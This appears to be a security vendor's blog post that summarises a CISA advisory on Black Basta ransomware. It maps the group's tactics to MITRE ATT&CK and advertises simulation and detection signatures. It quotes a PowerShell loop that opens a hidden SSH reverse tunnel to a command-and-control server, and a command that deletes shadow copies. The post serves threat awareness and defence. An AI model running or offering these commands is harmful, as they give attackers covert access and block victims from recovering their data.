Black Basta Ransomware Analysis, Simulation, and Mitigation - CISA Alert AA24-131A

The Blue Report 2024

Get a comprehensive analysis of over 136 million cyber attacks and understand the state of threat exposure management.

DOWNLOAD

On May 10, 2024, The Cybersecurity and Infrastructure Security Agency (CISA) released a joint advisory on Black Basta ransomware [1]. Black Basta is a Ransomware-as-a-Service (RaaS) group targeting critical infrastructure sectors in North America, Europe, and Australia. The RaaS group and its affiliates have impacted over 500 organizations globally. 

In this blog post, we explained the Tactics, Techniques, and Procedures (TTPs) used by Black Basta ransomware and how organizations can defend themselves against Black Basta ransomware attacks.

Black Basta Ransomware

Black Basta was first appeared in April 2022 and has become one of the prominent Ransomware-as-a-Service groups. The group and its affiliates are known to target construction, entertainment, healthcare, manufacturing, finance, and retail sectors. As of May 2024, Black Basta ransomware has compromised over 500 organizations in the United States, Germany, Canada, France, and Australia and other European countries.

Following the ransomware trends, Black Basta employs common ransomware tactics such as gaining access via phishing, exploiting known vulnerabilities, and double extortion. After initial access, adversaries run reconnaissance to map the target network and dump credentials using Mimikatz. Using harvested credentials, ransomware operators engage in privilege escalation and lateral movement to partially or completely compromise the target network. Prior to encryption, Black Basta threat actors disable defenses, exfiltrate the victims' sensitive information, and delete shadow volume copies. These actions allow them to stay hidden until the final impact and pressure their victims into paying ransom for the decryption key.

Black Basta Ransomware Analysis and MITRE ATT&CK TTPs

Initial Access

T1078 Valid Accounts

Black Basta threat actors are known to acquire valid credentials via Initial Access Brokers (IABs).  IABs find vulnerable systems by massively scanning networks for known vulnerabilities on remote systems and profit from the sale of remote access to enterprise networks in underground forums. The stolen credentials are used by threat actors to gain initial and persistent access to the target network.

T1190 Exploit Public Facing Applications

Adversaries exploit a known ConnectWise vulnerability to gain an initial foothold to target organizations. CVE-2024-1709 (CVSS Score: 10.0 Critical) was disclosed and patched in February 2024. As a known and critical vulnerability, unpatched ConnectWise ScreenConnect products pose a major risk to organizations.

T1566 Phishing

Black Basta operators use phishing emails with malicious payloads to gain initial access to target networks. Adversaries are observed to use Qakbot and its tactics to distribute their payload.

Execution

T1059.001 Command and Scripting Interpreter: PowerShell

Black Basta threat actors use PowerShell scripts to establish reverse shell connections to their C2 servers using SSH.

powershell "for(;;) {start ssh -Args \"a@%BCSERV% -о ServerAliveInterval=5 -f -N -R 0.0.0.0:%LISTEN_PORT% :127.0.0.1:22000 -p 443 -o StrictHostKeyChecking=no -i %MAINDIR%
\id_client.ini\" -WindowStyle Hidden -Wait}"

Privilege Escalation & Credential Access

T1068 Exploitation for Privilege Escalation & T1003 OS Credential Dumping

Black Basta affiliates use Mimikatz to dump credentials from LSASS memory. Then, extracted credentials used for privilege escalation and lateral movement. Adversaries also exploit known vulnerabilities such as ZeroLogon CVE-2020-1472, NoPac CVE-2021-42278 and CVE-2021-42287, and PrintNightmare CVE-2021-34527 for privilege escalation.

Defense Evasion

T1046 Network Service Discovery

Adversaries use the SoftPerfect Network scanner to collect information about hostnames, network services, and remote access protocols available in the compromised network.

Defense Evasion

T1036 Masquerading

Adversaries observed to change their reconnaissance tools' names to Intel or Dell to appear as legitimate software and evade defenses.

T1562.001 Impair Defenses: Disable or Modify Tools

Black Basta operators use a tool called Backstab to disable antivirus and EDR software prior to deploying the ransomware payload.

Lateral Movement

T1537 Transfer Data to Cloud Account

Black Basta group uses tools like BITSAdmin, Cobalt Strike, PsExec, RDP, Screen Connect, and Splashtop to move laterally in the compromised network.

Exfiltration

T1537 Transfer Data to Cloud Account

Black Basta threat actors use legitimate tools like WinSCP and rclone to exfiltrate data to adversary-controlled cloud services.

Impact

T1486 Data Encrypted for Impact 

Black Basta encrpytor uses a hybrid encryption scheme that uses ChaCha20 and RSA-4096 algorithms in combination. The encrypted files are appended with the .basta extension.

T1490 Inhibit System Recovery 

Adversaries use Volume Shadow Service Admin (vssadmin) to delete volume shadow copies and prevent their victims from recovering their encrypted files.

vssadmin delete shadows /all /quiet

How Picus Helps Simulate Black Basta Ransomware Attacks?

We also strongly suggest simulating Black Basta ransomware attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Complete Security Validation Platform. You can also test your defenses against hundreds of other ransomware variants, such as Phobos, ALPHV, and Play, within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for Black Basta ransomware

Threat ID

Threat Name

Attack Module

75663

Black Basta Ransomware Campaign

Windows Endpoint

53426

Black Basta Ransomware Email Threat

Email Infiltration (Phishing)

73218

Black Basta Ransomware Download Threat

Network Infiltration

Picus also provides actionable mitigation content. Picus Mitigation Library includes prevention signatures to address Black Basta ransomware and other ransomware attacks in preventive security controls. Currently, Picus Labs validated the following signatures for Black Basta ransomware:

Security Control

Signature ID

Signature Name

Check Point NGFW

0D881C4C2

Ransomware.Win32.BlackBasta.TC.11f5hokk

Check Point NGFW

0916DE2AB

Ransomware.Win32.Black Basta.TC.a90fEnMV

Cisco FirePower

 

W32.Auto:5d2204.in03.Talos

Cisco FirePower

 

W32.Auto:7883f0.in03.Talos

Forcepoint NGFW

 

File_Malware-Blocked 

Fortigate AV

476298

W32/Filecoder.C!tr

Fortigate AV

10088169

W32/Filecoder.OKW!tr

Palo Alto

545308754

ransomware/Win32.deepscan.ac

Palo Alto

488284769

ransomware/Win32.blackbasta.a

Trellix

0x4840c900

MALWARE: Malicious File Detected by GTI

Start simulating emerging threats today and get actionable mitigation insights with a  14-day free trialof the Picus Complete Security Validation Platform.

References

[1] "#StopRansomware: Black Basta," Cybersecurity and Infrastructure Security Agency CISA. Available: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-131a. [Accessed: May 13, 2024]